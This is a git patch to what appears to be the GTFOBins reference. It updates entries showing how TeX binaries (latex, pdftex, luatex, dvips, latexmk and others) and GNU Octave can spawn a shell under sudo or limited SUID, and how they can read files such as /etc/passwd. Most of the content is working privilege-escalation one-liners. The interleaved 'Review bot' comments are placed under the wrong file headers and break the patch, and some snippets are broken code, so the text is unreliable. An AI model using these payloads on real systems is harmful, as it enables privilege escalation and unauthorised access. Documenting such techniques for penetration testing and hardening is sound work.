From 21b641911e5666142e06f91078d3736c73e686ca Mon Sep 17 00:00:00 2001
From: Andrea Cardaci
Date: Mon, 26 Apr 2021 16:06:18 +0200
Subject: [PATCH] Fix and improve TeX binaries and GNU Octave
---
 _gtfobins/dvips.md | 18 +++++++++++++-----
 _gtfobins/latex.md | 24 +++++++++++++++++-------
 _gtfobins/latexmk.tex | 19 +++++++++++--------
 _gtfobins/lualatex.md | 12 ++++++++----
 _gtfobins/luatex.md | 13 ++++++++-----
 _gtfobins/octave.md | 12 ++++++++----
 _gtfobins/pdflatex.md | 24 +++++++++++++++++-------
 _gtfobins/pdftex.md | 12 +++++++++---
 _gtfobins/tex.md | 12 +++++++++---
 _gtfobins/xelatex.md | 24 +++++++++++++++++-------
 _gtfobins/xetex.md | 11 +++++++++--
 11 files changed, 126 insertions(+), 55 deletions(-)
diff --git a/_gtfobins/dvips.md b/_gtfobins/dvips.md
index bae048a..0b21e74 100644
--- a/_gtfobins/dvips.md
+++ b/_gtfobins/dvips.md
@@ -1,8 +1,16 @@
+---
+description: The `texput.dvi` output file produced by `tex` can be created offline and uploaded to the target.
 functions:
+ shell:
+ - code: |
+ tex '\special{psfile="`/bin/sh 1>&0"}\end'
+ dvips -R0 texput.dvi
 sudo:
 - code: |
- echo "\documentclass[12pt]{article} \begin{document}" > file.tex
- echo '$$\hbox to5cm{\vbox to5cm{\vfil\special{psfile="`PROGRAM > /tmp/result"}}\hfill}$$' >> file.tex
- echo "\end{document}" >> file.tex
- tex -interaction=nonstopmode file.tex && sudo dvips -R0 file.dvi
- cat /tmp/result
+ tex '\special{psfile="`/bin/sh 1>&0"}\end'
+ sudo dvips -R0 texput.dvi
+ limited-suid:
+ - code: |
+ tex '\special{psfile="`/bin/sh 1>&0"}\end'
+ ./dvips -R0 texput.dvi
+---
diff --git a/_gtfobins/latex.md b/_gtfobins/latex.md
index 71060ec..17919a0 100644
--- a/_gtfobins/latex.md
+++ b/_gtfobins/latex.md
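Review bot: Every new dvips invocation in this hunk passes `-R0`, which is the precondition the technique rests on, yet the added description does not mention it. As far as I recall from the dvips manual, `-R` selects dvips's secure mode, which blocks shell-command `psfile` specials when enabled, and recent TeX Live releases enable it by default, so a reader cannot tell from the entry which control stops this. I would extend the description with a sentence such as `Requires dvips secure mode to be turned off (-R0); it is enabled by default in recent TeX Live versions.` so the mitigating setting is visible next to the payload.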
@@ -1,11 +1,21 @@
-description: `latex` is a symbolic link to [`pdftex`](/gtfobins/pdftex/). However the program does not have the same behaviour regarding the name of argv[0]. This is the same behaviour for [`xetex`](/gtfobins/xetex/)/[`xelatex`](/gtfobins/xelatex/).
+---
 functions:
+ shell:
+ - code: |
+ latex --shell-escape '\documentclass{article}\begin{document}\immediate\write18{/bin/sh}\end{document}'
 file-read:
- - code: |
- echo "\documentclass[12pt]{article} \usepackage{verbatim} \begin{document} \verbatiminput{/etc/shadow} \end{document}" > read.tex
- latex read.tex
- strings read.dvi
+ - description: The read file will be part of the output.
+ code: |
+ latex '\documentclass{article}\usepackage{verbatim}\begin{document}\verbatiminput{file_to_read}\end{document}'
+ strings article.dvi
 sudo:
+ - description: The read file will be part of the output.
+ code: |
+ sudo latex '\documentclass{article}\usepackage{verbatim}\begin{document}\verbatiminput{file_to_read}\end{document}'
+ strings article.dvi
 - code: |
- echo "\documentclass[12pt]{article} \begin{document} \immediate\write18{/usr/bin/whoami} \end{document}" > file.tex
- sudo latex -shell-escape file.tex
+ sudo latex --shell-escape '\documentclass{article}\begin{document}\immediate\write18{/bin/sh}\end{document}'
+ limited-suid:
+ - code: |
+ ./latex --shell-escape '\documentclass{article}\begin{document}\immediate\write18{/bin/sh}\end{document}'
+---
diff --git a/_gtfobins/latexmk.tex b/_gtfobins/latexmk.tex
index 5e55bc3..bb43d63 100644
--- a/_gtfobins/latexmk.tex
+++ b/_gtfobins/latexmk.tex
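Review bot: The description line is removed and nothing replaces it, so latex.md now opens with a bare `---` and the shell, sudo and limited-suid entries depend on `--shell-escape` without saying why that flag matters; the pdflatex, pdftex, tex, xelatex and xetex hunks have the same gap. A one-line description would state both the precondition and the control that normally blocks it, for example `description: The --shell-escape option enables unrestricted \write18 command execution; the restricted shell escape that TeX Live enables by default only allows a fixed whitelist of programs.` I would add it here and in the five sibling files rather than leaving the front matter empty.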
@@ -1,11 +1,14 @@
-description: `latexmk` is a perl script.
+description: This allows to execute [`perl`](/gtfobins/perl/) code.
 functions:
+ shell:
+ - code: latexmk -e 'exec "/bin/sh";'
+ - code: latexmk -latex='/bin/sh #' /dev/null
 file-read:
- - code: |
- echo "\documentclass[12pt]{article} \usepackage{verbatim} \begin{document} \verbatiminput{/etc/shadow} \end{document}" > read.tex
- latexmk read.tex
- strings read.dvi
+ - code: latexmk -e 'open(X,"/etc/passwd");while(){print $_;}exit'
+ - description: The read file will be part of the output.
+ code: |
+ TF=$(mktemp)
+ echo '\documentclass{article}\usepackage{verbatim}\begin{document}\verbatiminput{file_to_read}\end{document}' >$TF
+ strings tmp.dvi
 sudo:
- - code: |
- echo "PROGRAM > /tmp/result.txt" > /tmp/run.sh
- sudo latexmk -latex="/tmp/run.sh" file.tex
+ - code: sudo latexmk -e 'exec "/bin/sh";'
diff --git a/_gtfobins/lualatex.md b/_gtfobins/lualatex.md
index 0cd0520..9a85d99 100644
--- a/_gtfobins/lualatex.md
+++ b/_gtfobins/lualatex.md
@@ -1,6 +1,10 @@
-description: `lualatex` is a symbolic link to [`luatex`](/gtfobins/luatex/). However the program does not have the same behaviour regarding the name of argv[0]. It allows to call external command with \write18 but it also allows to call external [`lua`](/gtfobins/lua/) scripts.
+---
+description: This allows to execute [`lua`](/gtfobins/lua/) code.
 functions:
+ shell:
+ - code: lualatex -shell-escape '\documentclass{article}\begin{document}\directlua{os.execute("/bin/sh")}\end{document}'
 sudo:
- - code: |
- echo "\documentclass[12pt]{article} \usepackage{shellesc} \begin{document} \write18{/usr/bin/id} \end{document}" > file.tex
- sudo lualatex -shell-escape file.tex
+ - code: sudo lualatex -shell-escape '\documentclass{article}\begin{document}\directlua{os.execute("/bin/sh")}\end{document}'
+ limited-suid:
+ - code: ./lualatex -shell-escape '\documentclass{article}\begin{document}\directlua{os.execute("/bin/sh")}\end{document}'
+---
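Review bot: `_gtfobins/latexmk.tex` is the only file in this commit that does not gain the leading and trailing `---` front-matter delimiters the other ten entries receive, and its `.tex` extension differs from every sibling `.md` path. If the site collection is keyed on Markdown files, as the other paths suggest, this entry is presumably not rendered at all, so the fixes in the hunk would be invisible. Renaming it to `_gtfobins/latexmk.md` and wrapping the content in `---` lines like the other files would bring it in line; the enclosing YAML document otherwise ends inside this hunk.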
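Review bot: The new lualatex entries spell the option `-shell-escape` while every other TeX entry in this commit (latex, pdflatex, pdftex, tex, xelatex, xetex) uses `--shell-escape`; the luatex hunk has the same inconsistency. As far as I know the TeX Live binaries accept both spellings, so this is style only, but one form across the collection reads better and `--shell-escape` matches the majority. I would change the three lualatex lines and the three luatex lines to the double-dash form.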
diff --git a/_gtfobins/luatex.md b/_gtfobins/luatex.md
index cbd4778..1014648 100644
--- a/_gtfobins/luatex.md
+++ b/_gtfobins/luatex.md
@@ -1,7 +1,10 @@
-description: `luatex` allows to call external [`lua`](/gtfobins/lua/) scripts.
+---
+description: This allows to execute [`lua`](/gtfobins/lua/) code.
 functions:
+ shell:
+ - code: luatex -shell-escape '\directlua{os.execute("/bin/sh")}\end'
 sudo:
- - code: |
- echo '\documentclass{article} \usepackage{luacode} \begin{document} \def\foo{\directlua{dofile("runfunc.lua")}} \foo \end{document}' > file.tex
- echo 'os.execute("/usr/bin/id")' > runfunc.lua
- luatex --interaction=nonstopmode --shell-escape file.tex
+ - code: sudo luatex -shell-escape '\directlua{os.execute("/bin/sh")}\end'
+ limited-suid:
+ - code: ./luatex -shell-escape '\directlua{os.execute("/bin/sh")}\end'
+---
diff --git a/_gtfobins/octave.md b/_gtfobins/octave.md
index 9fed372..df881f7 100644
--- a/_gtfobins/octave.md
+++ b/_gtfobins/octave.md
@@ -1,10 +1,14 @@
+---
 description: The payloads are compatible with GUI.
 functions:
 shell:
- - code: octave-cli --eval "system('/bin/sh')"
+ - code: octave-cli --eval 'system("/bin/sh")'
 file-write:
- - code: poctave-cli --eval 'filename = "file_to_write"; fid = fopen (filename, "w"); fputs (fid, "DATA"); fclose (fid);'
+ - code: octave-cli --eval 'filename = "file_to_write"; fid = fopen(filename, "w"); fputs(fid, "DATA"); fclose(fid);'
 file-read:
- - code: octave-cli --eval 'fid = fopen ("/etc/passwd"); while(!feof(fid)); txt = fgetl(fid), txt; endwhile; fclose (fid);'
+ - code: octave-cli --eval 'format none; fid = fopen("file_to_read"); while(!feof(fid)); txt = fgetl(fid); disp(txt); endwhile; fclose(fid);'
 sudo:
- - code: sudo octave-cli --eval "system('/bin/sh')"
+ - code: sudo octave-cli --eval 'system("/bin/sh")'
+ limited-suid:
+ - code: ./octave-cli --eval 'system("/bin/sh")'
+---
diff --git a/_gtfobins/pdflatex.md b/_gtfobins/pdflatex.md
index 9e9431a..2c8530b 100644
--- a/_gtfobins/pdflatex.md
+++ b/_gtfobins/pdflatex.md
@@ -1,11 +1,21 @@
-description: `pdflatex` is a symbolic link to [`pdftex`](/gtfobins/pdftex/). However the program does not have the same behaviour regarding the name of argv[0]. This is the same behaviour for [`xetex`](/gtfobins/xetex/)/[`xelatex`](/gtfobins/xelatex/).
+---
 functions:
+ shell:
+ - code: |
+ pdflatex --shell-escape '\documentclass{article}\begin{document}\immediate\write18{/bin/sh}\end{document}'
 file-read:
- - code: |
- echo "\documentclass[12pt]{article} \usepackage{verbatim} \hfuzz=25.002pt \begin{document} \verbatiminput{/etc/shadow} \end{document}" > read.tex
- latex read.tex
- #/etc/shadow is in read.pdf
+ - description: The read file will be part of the output.
+ code: |
+ pdflatex '\documentclass{article}\usepackage{verbatim}\begin{document}\verbatiminput{file_to_read}\end{document}'
+ pdftotext article.pdf -
 sudo:
+ - description: The read file will be part of the output.
+ code: |
+ sudo pdflatex '\documentclass{article}\usepackage{verbatim}\begin{document}\verbatiminput{file_to_read}\end{document}'
+ pdftotext article.pdf -
 - code: |
- echo "\documentclass[12pt]{article} \begin{document} \immediate\write18{/usr/bin/whoami} \end{document}" > file.tex
- sudo pdflatex -shell-escape file.tex
+ sudo pdflatex --shell-escape '\documentclass{article}\begin{document}\immediate\write18{/bin/sh}\end{document}'
+ limited-suid:
+ - code: |
+ ./pdflatex --shell-escape '\documentclass{article}\begin{document}\immediate\write18{/bin/sh}\end{document}'
+---
diff --git a/_gtfobins/pdftex.md b/_gtfobins/pdftex.md
index 5076003..56199a4 100644
--- a/_gtfobins/pdftex.md
+++ b/_gtfobins/pdftex.md
@@ -1,6 +1,12 @@
-description: `pdftex` has a similar behaviour as [`tex`](/gtfobins/tex/)
+---
 functions:
+ shell:
+ - code: |
+ pdftex --shell-escape '\write18{/bin/sh}\end'
 sudo:
 - code: |
- echo "\documentclass[12pt]{article} \begin{document} \write18{/usr/bin/id} \end{document}" > file.tex
- pdftex -interaction=nonstopmode --shell-escape file.tex
+ sudo pdftex --shell-escape '\write18{/bin/sh}\end'
+ limited-suid:
+ - code: |
+ ./pdftex --shell-escape '\write18{/bin/sh}\end'
+---
diff --git a/_gtfobins/tex.md b/_gtfobins/tex.md
index a67ad9b..9b2830d 100644
--- a/_gtfobins/tex.md
+++ b/_gtfobins/tex.md
@@ -1,6 +1,12 @@
-description: `tex` has a similar behaviour as [`pdftex`](/gtfobins/pdftex/)
+---
 functions:
+ shell:
+ - code: |
+ tex --shell-escape '\write18{/bin/sh}\end'
 sudo:
 - code: |
- echo "\documentclass[12pt]{article} \begin{document} \write18{/usr/bin/id} \end{document}" > file.tex
- tex -interaction=nonstopmode --shell-escape file.tex
+ sudo tex --shell-escape '\write18{/bin/sh}\end'
+ limited-suid:
+ - code: |
+ ./tex --shell-escape '\write18{/bin/sh}\end'
+---
diff --git a/_gtfobins/xelatex.md b/_gtfobins/xelatex.md
index 649a51e..7b0713a 100644
--- a/_gtfobins/xelatex.md
+++ b/_gtfobins/xelatex.md
@@ -1,11 +1,21 @@
-description: `xelatex` is a symbolic link to [`xetex`](/gtfobins/xetex/). However the program does not have the same behaviour regarding the name of argv[0].
+---
 functions:
+ shell:
+ - code: |
+ xelatex --shell-escape '\documentclass{article}\begin{document}\immediate\write18{/bin/sh}\end{document}'
 file-read:
- - code: |
- echo "\documentclass[12pt]{article} \usepackage{verbatim} \begin{document} \verbatiminput{/etc/shadow} \end{document}" > read.tex
- latexmk read.tex
- #/etc/shadow is in read.pdf
+ - description: The read file will be part of the output.
+ code: |
+ xelatex '\documentclass{article}\usepackage{verbatim}\begin{document}\verbatiminput{file_to_read}\end{document}'
+ strings article.dvi
 sudo:
+ - description: The read file will be part of the output.
+ code: |
+ sudo xelatex '\documentclass{article}\usepackage{verbatim}\begin{document}\verbatiminput{file_to_read}\end{document}'
+ strings article.dvi
 - code: |
- echo "\documentclass[12pt]{article} \begin{document} \immediate\write18{/usr/bin/whoami} \end{document}" > file.tex
- sudo xelatex -shell-escape file.tex
+ sudo xelatex --shell-escape '\documentclass{article}\begin{document}\immediate\write18{/bin/sh}\end{document}'
+ limited-suid:
+ - code: |
+ ./xelatex --shell-escape '\documentclass{article}\begin{document}\immediate\write18{/bin/sh}\end{document}'
+---
diff --git a/_gtfobins/xetex.md b/_gtfobins/xetex.md
index 9052329..cfe7926 100644
--- a/_gtfobins/xetex.md
+++ b/_gtfobins/xetex.md
@@ -1,5 +1,12 @@
+---
 functions:
+ shell:
+ - code: |
+ xetex --shell-escape '\write18{/bin/sh}\end'
 sudo:
 - code: |
- echo "\documentclass[12pt]{article} \begin{document} \immediate\write18{/usr/bin/whoami} \end{document}" > file.tex
- sudo xetex -interaction=nonstopmode -shell-escape file.tex
+ sudo xetex --shell-escape '\write18{/bin/sh}\end'
+ limited-suid:
+ - code: |
+ ./xetex --shell-escape '\write18{/bin/sh}\end'
+---